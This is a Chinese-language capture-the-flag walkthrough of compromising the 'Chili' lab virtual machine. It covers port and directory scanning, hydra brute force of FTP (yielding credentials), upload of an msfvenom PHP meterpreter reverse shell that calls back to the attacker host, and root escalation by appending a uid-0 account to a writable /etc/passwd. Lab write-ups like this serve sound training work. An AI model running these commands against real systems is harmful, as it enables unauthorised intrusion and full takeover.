靶机准备

首先将靶机ova文件导入

网络模式改为NAT
扫描ip

netdiscover -r 192.168.164.0/24

kali：192.168.164.137

渗透测试

扫描端口

nmap -sS -sV -T5 -A -p- 192.168.164.186

开启了2个端口：21、80

扫描目录：

dirb http://192.168.164.186

直接访问网站，只有一个小辣椒

查看源码，有一些关键信息

爬取关键词生成字典，爆破FTP服务

cewl http://192.168.164.186 > test.txt

爆破FTP

hydra -L /root/test.txt -P /usr/share/wordlists/fasttrack.txt -f -V ftp://192.168.164.186

获得用户：chili 密码：a1b2c3d4

利用

登入FTP

查看网站目录/var/www/html，看看文件和权限

发现.nano有最高权限，msf生成马上传到.nano里
生成马：

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.164.137 LPORT=1234 raw  > shell.php

ftp上传到.nano设置777权限

put /root/shell.php /var/www/html/.nano/shell1.php

将shell.php赋予执行权限

chmod 777 /var/www/html/.nano/shell1.php

MSF开启监控，连接php马

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.164.137
set lport 1234
run

提权

切换交互式shell

python3 -c "import pty;pty.spawn('/bin/bash')"

查看时普通权限

在/etc目录下看见passwd具有写操作，尝试/etc/passwd提权

使用命令：perl -le 'print crypt("test","test")' ，这个命令为使用perl脚本语言，执行crypt模块，将test加密字符串输出;

使用命令：echo "test:teH0wLIpW0gyQ:0:0:ROOT:/root:/bin/bash" >> /etc/passwd
在passwd文件中，写入test账户信息
成功提权

提权后进入root目录下获取flag